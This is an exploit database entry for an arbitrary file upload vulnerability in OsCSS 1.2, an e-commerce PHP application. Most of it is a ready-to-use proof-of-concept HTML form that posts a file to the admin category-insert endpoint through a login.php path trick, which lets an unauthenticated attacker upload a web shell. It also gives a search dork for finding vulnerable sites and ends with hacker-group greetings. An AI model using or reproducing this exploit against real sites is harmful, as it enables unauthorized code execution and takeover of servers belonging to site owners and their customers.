OsCSS 1.2 Arbitrary File Upload Vulnerability

2010-12-02T00:00:00
ID 1337DAY-ID-15015
Type zdt
Reporter Shichemt Alen
Modified 2010-12-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================
OsCSS 1.2 Arbitrary File Upload Vulnerability
=============================================

# Exploit Title: OsCSS Remote File Upload Exploit
# Date: 12-1-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10
# category: webapps/0day
# Dork : inurl:"sorry script'kiddies"
# Contact : [email protected] - http://www.shichemt-alen.com/
 
 
#Exploit :
Upload Shell
 
<html><head><title>Shell Upload</title></head>
<br><br><u>Upload Shell:</u><br>
<form name="file" action="http://localhost/admin/categories.php/login.php?action=insert_category&cPath=" method="post" enctype="multipart/form-data">
<input type="file" name="categories_image"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>
<center>
<a href="http://www.shichemt-alen.com/">Shichemt-Alen © 2010</a>
</center></html>
 
 
 
############ Made in Tunisia +216 ############
 
Greets to :  Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}
 
-----------------------
 
xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...
 
& All Tunisian and Muslim Hackers...
 
 
############ Made in Tunisia +216 ############



#  0day.today [2018-03-16]  #